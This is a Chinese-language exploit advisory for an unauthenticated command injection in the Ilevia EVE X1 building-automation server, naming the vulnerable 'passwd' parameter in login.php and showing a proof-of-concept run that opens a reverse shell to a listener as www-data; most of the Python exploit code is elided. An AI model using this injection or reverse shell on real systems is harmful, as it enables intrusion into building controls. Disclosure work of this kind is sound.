Ilevia EVE X1服务器4.7.18.0.eden Neuro-Core未授权代码入侵漏洞利用
漏洞信息
产品概述
EVE是一款智能家居和楼宇自动化解决方案,适用于住宅和商业环境,包括商场、酒店、餐厅、酒吧、健身房、水疗中心、会议室和办公室。它通过高度可定制的用户友好界面实现对电气安装的全面控制和监控。
EVE是一个多协议平台,集成了智能建筑内的各种系统,以提升舒适度、安全性、保障和能源效率。用户可以通过iPhone、iPad、Android设备、Windows PC或Mac电脑管理建筑功能。
EVE X1服务器是专为高级楼宇自动化需求设计的硬件解决方案。紧凑而强大,非常适合公寓、中小型住宅和小型商业设施。它旨在可靠高效地管理整个自动化系统。
漏洞描述
EVE X1服务器存在未授权的操作系统命令注入漏洞。该漏洞可通过/ajax/php/login.php脚本中的’passwd’ HTTP POST参数注入并执行任意shell命令。
漏洞验证
1
2
3
4
5
6
7
8
9
10
11
12
13
|
$ python eve.py 10.0.0.17:8080 10.0.0.3 5555
[+] Cyber-link active on 0.0.0.0:5555...
[*] Firing at http://10.0.0.17:8080/ajax/php/login.php
[+] Pulse from 10.0.0.17:40040
[*] Probing matrix with 'pwd' signal...
[+] Verifistring: /home/ilevia/www-config/http/ajax/php
[*] Synaptic intrusion confirmed, escalating to holo-shell...
[+] Holo-shell online. 'exit' to disengage.
>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
>> uname -a
Linux x1-eve 5.4.35-sunxi #trunk SMP Thu Apr 23 18:06:21 CEST 2020 armv7l GNU/Linux
>> exit
|
测试环境
- GNU/Linux 5.4.35 (armv7l)
- GNU/Linux 4.19.97 (armv7l)
- Armbian 20.02.1 Buster
- Apache/2.4.38 (Debian)
- PHP Version 7.3.14
漏洞发现
由Gjoko ‘LiquidWorm’ Krstic (@zeroscience)发现
漏洞编号
利用代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#!/usr/bin/env python
#
# Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion
#
# [完整Python利用代码...]
import socket, telnetlib, threading, time, requests, sys
def init_quantum(target_data):
if "http://" not in target_data and "https://" not in target_data:
target_data = "http://" + target_data
if ":" not in target_data.split("//")[1]:
target_data = target_data.rstrip("/") + ":80"
return target_data.rstrip("/")
[剩余利用代码...]
|
时间线
- 发现日期: 2024年5月1日
- 公布日期: 2025年7月31日
- CVSS评分: 8.8